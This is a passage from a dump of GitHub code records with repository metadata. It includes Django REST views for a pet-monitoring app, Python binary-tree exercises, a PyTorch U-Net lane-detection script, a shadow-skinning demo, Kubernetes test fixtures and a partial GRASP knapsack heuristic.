'password' missing.\")\n\n user = isUser(data)\n\n if not user:\n return gm.not_a_user()\n\n token = login(data, user)\n\n if token:\n loginToken = {\n \"login_token\" : token\n }\n return gm.successResponse(loginToken)\n\n else:\n return gm.clientError(\"Invalid userid/email or password.\")\n\n\nclass userLogout(APIView):\n\n def get(self, request):\n return gm.clientError(\"GET Method is not supported.\")\n\n def post(self, request):\n\n data = request.data\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n user = getUser(data)\n\n if logout(data, user):\n return gm.successResponse(\"Successfully logged out.\")\n\n else:\n return gm.errorResponse(\"Couldn't log out user.\")\n\n\n\n\nclass pets(APIView):\n\n def get(self, request):\n pets = []\n params = request.query_params\n\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n\n else:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n userPets = Pets.objects.filter(is_deleted = 0)\n else:\n userPets = Pets.objects.filter(userid=params[\"userid\"], is_deleted = 0)\n\n for m in userPets:\n pet = {\n \"petid\": m.petid,\n \"name\": m.name,\n \"breed\": m.breed,\n \"weight\": m.weight,\n \"weight_unit\" : m.weight_unit,\n \"image_url\" : m.image_url,\n \"birthday\" : m.birthday,\n \"userid\" : m.userid_id\n }\n pets.append(pet)\n\n return gm.successResponse(pets)\n\n\n def post(self, request):\n requiredParams = [ \"name\", \"breed\", \"birthday\", \"image_url\", \"weight\", \"weight_unit\"]\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n requiredParams.pop(3)\n\n emptyParams = gm.emptyParams(requiredParams, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError((emptyParamMessage.format(emptyParams)))\n\n user = getUser(data)\n\n try:\n if data[\"image_url\"] not in [\"\", None]:\n imageUrl = data[\"image_url\"]\n else:\n imageUrl = petDefaultImage\n\n pet = user.pets_set.create(name = data[\"name\"],\\\n breed = data[\"breed\"], birthday = data[\"birthday\"],\\\n weight = data[\"weight\"],\\\n weight_unit = data[\"weight_unit\"], image_url = imageUrl)\n\n pet.save()\n\n except Exception as e:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Error while saving device details.\")\n\n else:\n data[\"petid\"] = pet.petid\n data[\"image_url\"] = pet.image_url\n return gm.successResponse(data)\n\n\n\n def put(self, request):\n\n gm.errorLog(\"This\")\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"petid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n changeable = [\"petid\", \"name\", \"breed\", \"birthday\", \"image_url\", \"weight\", \"weight_unit\"]\n emptyParams = gm.emptyParams(changeable, data)\n if emptyParams:\n emptyParams = \", \".join(emptyParams)\n return gm.clientError(emptyParamMessage.format(emptyParams))\n\n user = getUser(data)\n pet = user.pets_set.filter(petid = data[\"petid\"], is_deleted = 0)\n\n if not pet:\n return gm.clientError(\"Invalid petid.\")\n\n pet = pet[0]\n try:\n pet = gm.change(pet, data, changeable)\n\n returnDict = {}\n for item in changeable:\n returnDict[item] = getattr(pet, item)\n\n return gm.successResponse(returnDict)\n\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n def delete(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"petid\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n try:\n pet = Pets.objects.get(petid = data[\"petid\"], is_deleted = 0)\n\n except Pets.DoesNotExist:\n return gm.clientError(\"Invalid petid.\")\n\n except :\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"Could not verify petid due to some error.\")\n\n else:\n pet.is_deleted = 1\n pet.save()\n return gm.successResponse(\"Pet with petid : {} successfully deleted.\".format(pet.petid))\n\n\n\nclass notificationUpdate(APIView):\n\n def post(self, request):\n gm.log(dir(request))\n data = gm.cleanData(request.data)\n gm.log(data)\n gm.log(request.query_params)\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"notification_token\", \"dev_type\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, data)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n user = getUser(data)\n tokenAdded = addNotificationToken(data, user)\n\n if tokenAdded:\n return gm.successResponse(\"notification_token updated successfully.\")\n\n else:\n return gm.errorResponse(\"There was an error while updating notification_token\")\n\n\n\n\nclass Event(APIView):\n\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\", \"machine_id\", \"startDate\", \"endDate\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n startDate = params[\"startDate\"]\n endDate = params[\"endDate\"]\n\n try:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n ev = events.objects.filter(date__range = (startDate, endDate), machine_id = params[\"machine_id\"]).order_by(\"-date\")\n else:\n ev = events.objects.filter(date__range = (startDate, endDate), machine_id = params[\"machine_id\"], userid = params[\"userid\"]).order_by(\"-date\")\n\n\n retSet = []\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n\n\n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"eventid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n item = getEvent(data)\n retSet=[]\n if not item:\n return gm.clientError(\"Invalid event id\")\n try:\n item=updateEvent(data,item.eventid)\n if item:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags\n\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n\"\"\"\nThis class will help us get the lastevent of a machine\nonly lookin, animal detection are taken\n\"\"\"\n\nclass LastEventOfTheMachine(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\", \"machine_id\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n impEvents = [ \"LOOKIN\", \"ANIMAL_DETECTION\"]\n\n try:\n user = getUser(params)\n if user.user_type.lower() in [\"admin\", \"customer_support\"]:\n ev = events.objects.filter (type__in=impEvents, machine_id = params[\"machine_id\"]).order_by(\"-date\")[:1]\n else:\n ev = events.objects.filter (type__in=impEvents, machine_id = params[\"machine_id\"], userid = params[\"userid\"]).order_by(\"-date\")[:1] \n\n\n retSet = []\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n \n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\n\n\"\"\"\nThis class will help us to get the filte th events based on the provided params\n\"\"\"\nclass FilterEvent(APIView):\n\n \n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"userid\",\"startDate\", \"endDate\", ]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n startDate = params[\"startDate\"]\n endDate = params[\"endDate\"]\n\n isFlagged=params.get(\"isFlagged\")\n\n mlist=params.get(\"mlist\")\n if mlist!= None:\n mlist=mlist.strip()\n mlist= list(mlist.split(\",\")) \n print(\"machine list is \"+str(mlist))\n\n typelist=params.get(\"typelist\")\n \n if typelist!= None:\n typelist=typelist.strip()\n typelist= list(typelist.split(\",\")) \n \n flagslist=params.get(\"flags\")\n \n if flagslist!= None:\n flagslist=flagslist.strip()\n flagslist= list(flagslist.split(\",\")) \n\n if validateEventTypeFalgLists(mlist,typelist,flagslist)== False:\n return gm.errorResponse(\"Invalid attribute in machine list, type list or in flags\")\n\n retSet = []\n try:\n \n ev=fileterEventsByMachines(params[\"userid\"],startDate,endDate,mlist,typelist,flagslist,isFlagged)\n\n if ev is not None:\n\n for item in ev:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags,\n })\n\n return gm.successResponse(retSet)\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error generating response\")\n\"\"\"\nThis class will help us flag and update an event without the mqtt\nTODO add the image size\n\n\"\"\"\nclass MqttEvent(APIView):\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n requiredParams = [\"timestamp\",\"imagesize\",\"type\",\"machine_id\",\"userid\"]\n missingParams = gm.missingParams(requiredParams, data)\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n\n item = getEventByTimestampAndSize(data)\n retSet=[]\n if not item:\n return gm.clientError(\"Invalid event\")\n try:\n item=updateEvent(data,item.eventid)\n if item:\n retSet.append({\n \"eventid\" : item.eventid,\n \"date\" : item.date,\n \"value\" : item.value,\n \"type\" : item.type,\n \"isflagged\":item.isflagged,\n \"note\":item.note,\n \"tags\":item.tags\n\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n\nclass GraphEventCount(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"type\",\"machineid\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n ev = getTheMonthlyEventsCountBasedOnType(params[\"type\"],params[\"machineid\"])\n if ev is not None:\n retSet=[]\n for item in ev:\n retSet.append({\n \"event_date\":item.event_date,\n \"event_count\" : item.event_count\n })\n\n return gm.successResponse(retSet)\n \n\nclass TimerSlotDetials(APIView):\n\n def get(self, request):\n\n params = gm.cleanData(request.query_params)\n hasError = hasErrorAuthenticate(params)\n if hasError:\n return hasError\n\n requiredParams = [\"machine_id\"]\n emptyOrMissing = gm.getMissingEmptyParams(requiredParams, params)\n\n if emptyOrMissing:\n return emptyOrMissing\n\n ev = fileterTimeslotsByMachines(params[\"machine_id\"],params[\"userid\"])\n\n if ev is not None:\n retSet=[]\n for item in ev:\n retSet.append({\n \"timerid\" : item.timerId,\n \"timeinsecond\" : item.timeinseconds,\n \"weeks\" : item.weeklystring,\n \"weeklyvalue\" : item.weekly_value,\n \"isactive\":item.is_active,\n \"isdeleted\":item.is_deleted,\n })\n return gm.successResponse(retSet)\n\n\n \"\"\" Takes teh create_flag boolean parameter which invokes the creation of timer if it is true\n and if it is false, it will update the existing timer with timerid attribiute \"\"\"\n\n def post(self, request):\n\n data = gm.cleanData(request.data)\n\n hasError = hasErrorAuthenticate(data)\n if hasError:\n return hasError\n\n\n requiredParams = [\"userid\",\"weeks\",\"activity_flag\",\"seconds\",\"machine_id\",\"create_flag\"]\n missingParams = gm.missingParams(requiredParams, data)\n\n if missingParams:\n missingParams = \", \".join(missingParams)\n return gm.clientError(missingParamMessage.format(missingParams))\n \n try:\n weeks= None if \"weeks\" not in data else data[\"weeks\"]\n timeinseconds= None if \"seconds\" not in data else data[\"seconds\"]\n isActive= None if \"activity_flag\" not in data else data[\"activity_flag\"]\n isCreateFlag= None if \"create_flag\" not in data else data[\"create_flag\"]\n timeinseconds= None if \"seconds\" not in data else data[\"seconds\"]\n timerid= None if \"timerid\" not in data else data[\"timerid\"]\n delete_flag= None if \"delete_flag\" not in data else data[\"delete_flag\"]\n\n \n\n \n if int(isCreateFlag):\n item = createTimerForMachine(weeks,timeinseconds,isActive,data[\"machine_id\"])\n else:\n \n if timerid is None:\n return gm.clientError(\"timerid missing in post data.\")\n \n item=updateTimerForMachine(weeks,timeinseconds,isActive,data[\"machine_id\"],timerid,delete_flag)\n \n retSet=[]\n if item:\n retSet.append({\n \"timerid\" : item.timerId,\n \"timeinsecond\" : item.timeinseconds,\n \"weeks\" : item.weeklystring,\n \"weeklyvalue\" : item.weekly_value,\n \"isactive\":item.is_active,\n \"isdeleted\":item.is_deleted,\n })\n\n return gm.successResponse(retSet)\n else:\n return gm.errorResponse(\"something went wrong\")\n\n except:\n traceback.print_exc()\n gm.errorLog(traceback.format_exc())\n return gm.errorResponse(\"There was some error while making changes. Try again later.\")\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n\n","repo_name":"cumulations/brilliantPet","sub_path":"brilliantPet/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":29832,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"9007178387","text":"#implement binary tree fcns like insert, delete and find\r\n\r\nclass Node:\r\n\tdef __init__(self,data):\r\n\t\tself.data = data\r\n\t\tself.left = None\r\n\t\tself.right = None\r\n\t\t\r\n\r\ndef insert(node,data):\r\n\t#new_node = Node(data)\r\n\t#node = root\r\n\twhile(node != None):\r\n\t\tif(node.data= data and node.left == None):\r\n\t\t\tnode.left = Node(data)\r\n\t\t\tbreak\r\n\t\telif(node.data>= data):\r\n\t\t\tnode = node.left\r\n\r\ndef find(root,data):\r\n\t\t\t\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right\")\r\n\t\tif(find(root.right,data)):\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\treturn True\t\t\r\n\t\r\n\tif(root.left):\r\n\t\tif(find(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\treturn True\r\n\t\telse:\r\n\t\t\tprint(\"data not found in left sub tree of %d\"%root.data)\r\n\t\t\t\r\n\t\r\n\tprint(\"data not found in left or right sub tree of %d\"%root.data)\r\n\treturn False\r\n\t\t\t\r\n\r\ndef find_and_delete_min(root):\r\n\tto_be_Deleted = root\r\n\tright_subtree = to_be_Deleted.right\r\n\tif (not right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = None\r\n\t\treturn right_subtree.data\r\n\telif (right_subtree.right and not right_subtree.left):\r\n\t\tto_be_Deleted.right = right_subtree.right\r\n\t\treturn right_subtree.data\r\n\telse:\r\n\t\tsmallest = right_subtree.left\r\n\t\twhile(smallest.left):\r\n\t\t\tright_subtree = right_subtree.left\r\n\t\t\tsmallest = right_subtree.left\r\n\t\r\n\t\tans = smallest.data\r\n\t\tif(smallest.right):\r\n\t\t\tright_subtree.left = smallest.right\r\n\t\telse:\r\n\t\t\tright_subtree.left = None\r\n\t\treturn smallest.data\r\n\t\t\t\r\n\t\t\t\r\ndef delete(root,data):\r\n\tif(root.data == data):\r\n\t\tprint(\"found the data,returning True\")\r\n\t\treturn True\r\n\t\t\t\r\n\tif(root.right):\r\n\t\tprint(\"entering root.right with root %d\" %root.data)\r\n\t\tif(delete(root.right,data)):\r\n\t\t\tprint(\"to_be_Deleted is %d\"%root.right.data)\r\n\t\t\tprint(\"data found in right sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.right\t\t\t\r\n\t\t\tif(not to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\troot.right = None\r\n\t\t\telif(to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\t#has a left child\r\n\t\t\t\troot.right = to_be_Deleted.left\r\n\t\t\telif(not to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has a right child\r\n\t\t\t\troot.right = to_be_Deleted.right\r\n\t\t\telif(to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has both children\r\n\t\t\t\tvalue = find_and_delete_min(to_be_Deleted)\r\n\t\t\t\tto_be_Deleted.data = value\r\n\t\t\t\r\n\t\t\t\t\t\t\r\n\t\t\t\t\r\n\tif(root.left):\r\n\t\tif(delete(root.left,data)):\r\n\t\t\tprint(\"data found in left sub tree of %d\"%root.data)\r\n\t\t\tto_be_Deleted = root.left\r\n\t\t\tprint(\"to_be_Deleted is %d\"%to_be_Deleted.data)\r\n\t\t\tif(not to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\troot.right = None\r\n\t\t\telif(to_be_Deleted.left and not to_be_Deleted.right):\r\n\t\t\t\t#has a left child\r\n\t\t\t\troot.left = to_be_Deleted.left\r\n\t\t\telif(not to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has a right child\r\n\t\t\t\troot.left = to_be_Deleted.right\r\n\t\t\telif(to_be_Deleted.left and to_be_Deleted.right):\r\n\t\t\t\t#has both children\r\n\t\t\t\tvalue = find_and_delete_min(to_be_Deleted)\r\n\t\t\t\tto_be_Deleted.data = value\r\n\t\t\r\n\t\r\n\tprint(\"data not found in left or right sub tree of %d\"%root.data)\r\n\t#return False\r\n\t\r\n\t\t\t\r\ndef traverse(root):\r\n\tif(root.left):\r\n\t\ttraverse(root.left)\r\n\tprint(root.data)\r\n\tif(root.right):\r\n\t\ttraverse(root.right)\r\n\r\n\t\r\n\t\r\nnode = Node(20)\r\ninsert(node,15)\r\ninsert(node,35)\r\ninsert(node,10)\r\ninsert(node,12)\r\ninsert(node,28)\r\ninsert(node,22)\r\ninsert(node,45)\r\ntraverse(node)\r\n#ans = find(node,22)\r\n#print(ans)\r\ndelete(node,28)\r\ntraverse(node)\r\n\r\n\r\n\r\n\t\r\n","repo_name":"amolikab/Trees-n-Graphs","sub_path":"#implement binary tree fcns like insert, delete and find.py","file_name":"#implement binary tree fcns like insert, delete and find.py","file_ext":"py","file_size_in_byte":3704,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"72191278856","text":"# C:\\Users\\joeys\\source\\virtualenvs\\pytorchenv\\Scripts\\activate.bat\n\nimport cv2\nimport numpy as np\nimport torchvision.transforms as T\nimport matplotlib.pyplot as plt\nimport torch\nimport torch.nn as nn\nimport torchvision.transforms.functional as TF\nimport albumentations as A\nfrom PIL import Image\nfrom albumentations.pytorch import ToTensorV2\n\n\nCHECKPOINT_PATH = r\"C:\\Users\\joeys\\source\\lane-detection\\my_checkpoint.pth.tar\"\nVIDEO_FILE = r\"C:\\Users\\joeys\\OneDrive\\Desktop\\production ID_4608285.mp4\"\nSENSITIVITY = 230 # between 0-255, decides which values to count for mask\nSCALE_PERCENTAGE = 50\n\nDEVICE = \"cuda\" if torch.cuda.is_available() else \"cpu\"\nIMAGE_HEIGHT = 320 # 1280 originally\nIMAGE_WIDTH = 480 # 1918 originally\n\n\n\n\nclass DoubleConv(nn.Module):\n def __init__(self, in_channels, out_channels):\n super(DoubleConv, self).__init__()\n self.conv = nn.Sequential(\n nn.Conv2d(in_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n nn.Conv2d(out_channels, out_channels, 3, 1, 1, bias=False),\n nn.BatchNorm2d(out_channels),\n nn.ReLU(inplace=True),\n )\n\n def forward(self, x):\n return self.conv(x)\n\nclass UNET(nn.Module):\n def __init__(\n self, in_channels=3, out_channels=1, features=[64, 128, 256, 512],\n ):\n super(UNET, self).__init__()\n self.ups = nn.ModuleList()\n self.downs = nn.ModuleList()\n self.pool = nn.MaxPool2d(kernel_size=2, stride=2)\n\n # Down part of UNET\n for feature in features:\n self.downs.append(DoubleConv(in_channels, feature))\n in_channels = feature\n\n # Up part of UNET\n for feature in reversed(features):\n self.ups.append(\n nn.ConvTranspose2d(\n feature*2, feature, kernel_size=2, stride=2,\n )\n )\n self.ups.append(DoubleConv(feature*2, feature))\n\n self.bottleneck = DoubleConv(features[-1], features[-1]*2)\n self.final_conv = nn.Conv2d(features[0], out_channels, kernel_size=1)\n\n def forward(self, x):\n skip_connections = []\n\n for down in self.downs:\n x = down(x)\n skip_connections.append(x)\n x = self.pool(x)\n\n x = self.bottleneck(x)\n skip_connections = skip_connections[::-1]\n\n for idx in range(0, len(self.ups), 2):\n x = self.ups[idx](x)\n skip_connection = skip_connections[idx//2]\n\n if x.shape != skip_connection.shape:\n x = TF.resize(x, size=skip_connection.shape[2:])\n\n concat_skip = torch.cat((skip_connection, x), dim=1)\n x = self.ups[idx+1](concat_skip)\n\n return self.final_conv(x)\n\n def test():\n x = torch.randn((3, 1, 161, 161))\n model = UNET(in_channels=1, out_channels=1)\n preds = model(x)\n assert preds.shape == x.shape\n\n\nmodel = UNET(in_channels=3, out_channels=1).to(DEVICE)\nmodel_file = torch.load(CHECKPOINT_PATH)\nmodel.load_state_dict(model_file['state_dict'])\nmodel.eval()\n\ntrain_transform = A.Compose(\n [\n A.Resize(height=IMAGE_HEIGHT, width=IMAGE_WIDTH),\n A.Rotate(limit=35, p=1.0),\n A.HorizontalFlip(p=0.5),\n A.VerticalFlip(p=0.1),\n A.Normalize(\n mean=[0.0, 0.0, 0.0],\n std=[1.0, 1.0, 1.0],\n max_pixel_value=255.0,\n ),\n ToTensorV2(),\n ],\n )\n\n\n\ncap = cv2.VideoCapture(VIDEO_FILE)\n \nif (cap.isOpened()== False):\n print(\"Error opening video file\")\n \nwhile(cap.isOpened()):\n \n ret, frame = cap.read()\n if ret == True:\n width = int(frame.shape[1] * SCALE_PERCENTAGE / 100)\n height = int(frame.shape[0] * SCALE_PERCENTAGE / 100)\n dsize = (width, height)\n frame = cv2.resize(frame, dsize)\n augmentations = train_transform(image=frame)\n image = augmentations[\"image\"]\n image = image.to('cuda')\n image = image.unsqueeze(0)\n \n with torch.no_grad():\n pred = torch.sigmoid(model(image))\n pred = (pred > 0.5).float()\n\n transform = T.ToPILImage()\n pred = torch.squeeze(pred)\n predicted_mask = transform(pred)\n predicted_mask = np.array(predicted_mask)\n image = frame\n predicted_mask = cv2.resize(predicted_mask, (image.shape[1], image.shape[0]))\n color_mask = np.zeros_like(image)\n color_mask[predicted_mask >= SENSITIVITY] = (0, 0, 255) # green color\n masked_color = cv2.bitwise_and(image, color_mask)\n output = cv2.addWeighted(image, 0.9, masked_color, 0.9, 1)\n\n\n\n cv2.imshow('Frame', output)\n \n if cv2.waitKey(25) & 0xFF == ord('q'):\n break\n \n else:\n break\n \ncap.release()\ncv2.destroyAllWindows()","repo_name":"joeysantana3/lane-detection","sub_path":"pytorch_script.py","file_name":"pytorch_script.py","file_ext":"py","file_size_in_byte":4916,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"71880985417","text":"#Node greater than x\nfrom binarytree import takeinput, printdata\n\ndef nodegtx(root, x):\n if root is None:\n return \n count=0\n if root.data>x:\n count+=1\n return count\n \n left=nodegtx(root.left,x)\n right=nodegtx(root.right,x)\n\n return count+left +right\n\n\nroot=takeinput()\nprintdata(root)\nx=int(input())\nprint(nodegtx(root,x))\n","repo_name":"iamanx17/dslearn","sub_path":"Binary Tree/nodegx.py","file_name":"nodegx.py","file_ext":"py","file_size_in_byte":365,"program_lang":"python","lang":"ja","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"35457224690","text":"import sys\n\nimport cv2\nimport matplotlib.pyplot as plt\n\nfrom tf_pose.common import read_imgfile\n\nfrom lib.draw import draw_circle\nfrom lib.contour import find_human_contour\nfrom lib.skeleton import SkeletonImplement, SkeletonTest\nfrom lib.skinning import Skinning\n\nif __name__ == '__main__':\n src = read_imgfile(\"./images/shadow.jpg\", None, None)\n dst = src.copy()\n human_contour = find_human_contour(src)\n if human_contour is None:\n print(\"Not a human contour has detected in the image.\")\n sys.exit(0)\n\n skeletonImplement = SkeletonImplement()\n human = skeletonImplement.infer_skeleton(src)\n if human is None:\n print(\"Not a human has detected in the image.\")\n sys.exit(0)\n\n skeletonTest = SkeletonTest(human, human_contour, src.shape)\n if not skeletonTest.is_reliable():\n skeletonTest.report()\n print(\"This skeleton model is not reliable.\")\n sys.exit(0)\n\n skinning = Skinning(src, human, human_contour, algorithm=\"nearest_neighbour_within_contour\")\n\n # visualization\n for i in [100, 300, 500]:\n draw_circle(dst, skinning.contour_vertex_positions[i], (255, 0, 0))\n draw_circle(dst, skinning.body_part_positions[skinning.nearest_body_part_indices[i]])\n\n plt.imshow(cv2.cvtColor(dst, cv2.COLOR_BGR2RGB))\n plt.show()\n","repo_name":"ajingu/ShadowSkinning","sub_path":"nearest_neighbour_skinning.py","file_name":"nearest_neighbour_skinning.py","file_ext":"py","file_size_in_byte":1319,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"45"} +{"seq_id":"74584948937","text":"from scan.test.fetch.kube_fetch.test_data.kube_access import HOST_DOC\n\nPODS_LIST = [{\n \"_id\": \"5aafe39f89f6e7759a516a5f\",\n \"environment\": \"kube-aci\",\n \"id\": \"66745de5-1b33-11e8-9d88-00505699cf9e\",\n \"type\": \"pod\",\n \"parent_type\": \"pods_folder\",\n \"labels\": {\n \"controller-revision-hash\": \"1818740607\",\n \"app\": \"flannel\",\n \"pod-template-generation\": \"1\",\n \"tier\": \"node\"\n },\n \"name_path\": \"/kube-aci/Hosts/kub2-aci/Pods/kube-flannel-ds-4bn8q\",\n \"id_path\": \"/kube-aci/kube-aci-hosts/kub2-aci/kub2-aci-pods/66745de5-1b33-11e8-9d88-00505699cf9e\",\n \"node_name\": \"kub2-aci\",\n \"namespace\": \"kube-system\",\n \"uid\": \"66745de5-1b33-11e8-9d88-00505699cf9e\",\n \"name\": \"kube-flannel-ds-4bn8q\",\n \"parent_text\": \"Pods\",\n \"host\": \"kub2-aci\",\n \"object_name\": \"kube-flannel-ds-4bn8q\",\n \"parent_id\": \"kub2-aci-pods\"\n}]\n\n_POD = PODS_LIST[0]\nEXPECTED_VEDGE = {\n 'id': '{}-vedge'.format(HOST_DOC['id']),\n 'host': HOST_DOC['id'],\n 'environment': HOST_DOC['environment'],\n 'name': _POD['name'],\n 'namespace': _POD['namespace'],\n 'node_name': HOST_DOC['id'],\n 'parent_id': '{}-vedges'.format(HOST_DOC['id']),\n 'parent_type': 'vedges_folder'\n}","repo_name":"korenlev/calipso-cvim","sub_path":"scan/test/fetch/kube_fetch/test_data/kube_fetch_vedges.py","file_name":"kube_fetch_vedges.py","file_ext":"py","file_size_in_byte":1217,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"45"} +{"seq_id":"70845317896","text":"\"\"\"\n\n\n\n\n RETIRAR!!!!!!!!!!!!!!\n\n\n\n\"\"\"\n\n\nfrom random import randint, uniform\nimport numpy as np\nimport random\n\ndef get_value_set(set, vw):\n total_value = 0\n total_weigth = 0\n\n for i in range(len(set)):\n if set[i] == 1:\n v = vw[i][0]\n w = vw[i][1]\n total_value += v\n total_weigth += w\n return total_value, total_weigth\n\ndef new_matrix(l, c, w, vw):\n new_m = np.full(c, 0)\n removed = []\n weigth = 0\n\n new_m = grasp(vw, removed, new_m, w)\n\n return new_m\n\ndef get_value(kps, items):\n valuer, weigth = 0\n for i, v in enumerate(items):\n if kps[i]:\n valuer += v[0]\n weigth += v[1]\n\ndef grasp(items, removed, m, w):\n MAX = 0.6\n MIN = 0.4\n ALPHA = MAX\n \n weigth = 0\n indexs = list(range(len(items)))\n rlc = []\n\n while weigth < w and indexs:\n rlc = []\n maxim = max(items[indexs], key=lambda x: (x[0] / x[1]))\n maxim = maxim[0] / maxim[1]\n minim = min(items[indexs], key=lambda x: (x[0] / x[1]))\n minim = minim[0] / minim[1]\n\n b = minim + ALPHA * (maxim - minim)\n\n for i in indexs:\n if (items[i][0] / items[i][1]) >= b:\n rlc.append(i)\n\n if rlc:\n selected_c = random.uniform(0, len(rlc) - 1)\n selected_c = rlc[int(selected_c)]\n else:\n break\n\n m[selected_c] = 1\n _, weigth = get_value_set(m, items)\n \n indexs.pop(indexs.index(selected_c))\n\n return m\n\ndef main():\n v_w = [[randint(600, 800), randint(30, 60)] for _ in range(10)]\n max_weight = 170\n\n 